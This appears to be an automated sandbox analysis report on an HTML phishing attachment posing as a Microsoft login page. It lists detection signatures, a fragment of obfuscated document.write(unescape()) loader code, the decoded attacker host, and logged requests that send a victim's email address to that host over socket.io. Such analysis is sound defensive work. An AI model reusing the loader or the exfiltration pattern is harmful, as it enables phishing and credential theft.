Edit tour

Windows Analysis Report
faturas_dsp.qs.pt_Wednesday, June 5, 2024.html

Overview

General Information

Sample name:	faturas_dsp.qs.pt_Wednesday, June 5, 2024.html
Analysis ID:	1464027
MD5:	da0e2e9aa5fdb917804890339d2489b9
SHA1:	8b750c233f72b819f00e2bcaf353788522c24cea
SHA256:	a24b2a8ca23148775aef82e52f5ebe51aa1bf62c2e129d2b125e1bbb67c8c448
Infos:

Detection

HTMLPhisher

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Yara detected HtmlPhish10

Detected javascript redirector / loader

HTML Script injector detected

HTML file submission containing password form

HTML page contains obfuscate javascript

Phishing site detected (based on logo match)

Suspicious Javascript code found in HTML file

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden URLs or javascript code

HTML title does not match URL

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Invalid 'forgot password' link found

Invalid T&C link found

JA3 SSL client fingerprint seen in connection with other malware

None HTTPS page querying sensitive user data (password, username or email)

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 1996 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\faturas_dsp.qs.pt_Wednesday, June 5, 2024.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4304 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2016,i,5976744131407825480,12042255219168060016,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
0.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.2.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://fiveradio-newbam.com/socket.io/?EIO=4&transport=polling&t=P1TlBfJ	Avira URL Cloud: Label: phishing
Source: https://fiveradio-newbam.com/socket.io/?EIO=4&transport=polling&t=P1TlBzB&sid=n9v-59KTv8aKOUjkACUR	Avira URL Cloud: Label: phishing
Source: https://fiveradio-newbam.com/socket.io/?EIO=4&transport=websocket&sid=n9v-59KTv8aKOUjkACUR	Avira URL Cloud: Label: phishing
Source: https://fiveradio-newbam.com/jsnom.js	Avira URL Cloud: Label: phishing
Source: https://fiveradio-newbam.com/socket.io/?EIO=4&transport=polling&t=P1TlBzD&sid=n9v-59KTv8aKOUjkACUR	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: fiveradio-newbam.com	Virustotal: Detection: 17%			Perma Link
Source: https://fiveradio-newbam.com/jsnom.js	Virustotal: Detection: 14%			Perma Link

Phishing

AI detected phishing page

Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html

LLM: Score: 9 brands: Microsoft Reasons: The URL 'file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html' is a local file path, not a legitimate web domain. This is highly suspicious as legitimate login pages are hosted on secure web servers. The page mimics Microsoft's login interface, which is a common tactic in phishing attacks to deceive users. The presence of a CAPTCHA and prominent login form are typical elements of a legitimate site, but in this context, they are used to enhance the deception. The URL does not match Microsoft's legitimate domain 'microsoft.com'. The combination of these factors strongly indicates that this is a phishing site. DOM: 0.1.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: 0.2.pages.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML

Detected javascript redirector / loader

Source: faturas_dsp.qs.pt_Wednesday, June 5, 2024.html

HTTP Parser: Low number of body elements: 0

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: New script, src: https://cdn.socket.io/4.6.0/socket.io.min.js
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: New script, src: https://cdn.socket.io/4.6.0/socket.io.min.js
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: New script, src: https://cdn.socket.io/4.6.0/socket.io.min.js

HTML page contains obfuscate javascript

Source: faturas_dsp.qs.pt_Wednesday, June 5, 2024.html	HTTP Parser: document.write(unescape(%3c%73%63%72%69%70%74%3e%0d%0a%20%20%20%20%20%20%20%20%76%61%72%20%73%63%20%
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: document.write(unescape(%3c%73%63%72%69%70%74%3e%0d%0a%20%20%20%20%20%20%20%20%76%61%72%20%73%63%20%
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: document.write(unescape(%3c%73%63%72%69%70%74%3e%0d%0a%20%20%20%20%20%20%20%20%76%61%72%20%73%63%20%
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: document.write(unescape(%3c%73%63%72%69%70%74%3e%0d%0a%20%20%20%20%20%20%20%20%76%61%72%20%73%63%20%

Phishing site detected (based on logo match)

Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	Matcher: Template: microsoft matched
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	Matcher: Template: microsoft matched

Suspicious Javascript code found in HTML file

Source: faturas_dsp.qs.pt_Wednesday, June 5, 2024.html

HTTP Parser: document.write

Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html

HTTP Parser: Number of links: 0

Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: faturas_dsp.qs.pt_Wednesday, June 5, 2024.html

HTTP Parser: Base64 decoded: https://fiveradio-newbam.com

Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html

HTTP Parser: Title: Authenticating ... does not match URL

Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html

HTTP Parser: Invalid link: Forgot password?

Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: Invalid link: Privacy & cookies
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: Invalid link: Privacy & cookies
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: Invalid link: Privacy & cookies

Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html

HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html

HTTP Parser: <input type="password" .../> found

Source: faturas_dsp.qs.pt_Wednesday, June 5, 2024.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:58281 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:58282 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:58283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:58296 version: TLS 1.2

Source: global traffic

TCP traffic: 192.168.2.16:58278 -> 1.1.1.1:53

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 13.107.246.42 13.107.246.42
Source: Joe Sandbox View	IP Address: 13.107.253.44 13.107.253.44
Source: Joe Sandbox View	IP Address: 18.245.31.78 18.245.31.78
Source: Joe Sandbox View	IP Address: 192.229.133.221 192.229.133.221
Source: Joe Sandbox View	IP Address: 13.107.246.60 13.107.246.60

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jsnom.js HTTP/1.1Host: fiveradio-newbam.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: nullsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FLSA+llPh9RxhO4&MD=CDP8dsfS HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P1TlBfJ HTTP/1.1Host: fiveradio-newbam.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /Auth_UID: USER21052024UNIQUE1031052124202420240521311024Session_Email: maria.dixe@dsp.qs.ptsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=n9v-59KTv8aKOUjkACUR HTTP/1.1Host: fiveradio-newbam.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: nullSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 8a/5yWoHJJGEPPrqMZOumg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P1TlBfJ HTTP/1.1Host: fiveradio-newbam.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P1TlBzD&sid=n9v-59KTv8aKOUjkACUR HTTP/1.1Host: fiveradio-newbam.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /Auth_UID: USER21052024UNIQUE1031052124202420240521311024Session_Email: maria.dixe@dsp.qs.ptsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P1TlBzB&sid=n9v-59KTv8aKOUjkACUR HTTP/1.1Host: fiveradio-newbam.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P1TlBzD&sid=n9v-59KTv8aKOUjkACUR HTTP/1.1Host: fiveradio-newbam.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FLSA+llPh9RxhO4&MD=CDP8dsfS HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: cdn.socket.io
Source: global traffic	DNS traffic detected: DNS query: fiveradio-newbam.com
Source: global traffic	DNS traffic detected: DNS query: www.w3schools.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com

Source: unknown

HTTP traffic detected: POST /socket.io/?EIO=4&transport=polling&t=P1TlBzB&sid=n9v-59KTv8aKOUjkACUR HTTP/1.1Host: fiveradio-newbam.comConnection: keep-aliveContent-Length: 2sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Auth_UID: USER21052024UNIQUE1031052124202420240521311024sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-type: text/plain;charset=UTF-8Accept: */*Session_Email: maria.dixe@dsp.qs.ptsec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58295 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58291 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58299 -> 443
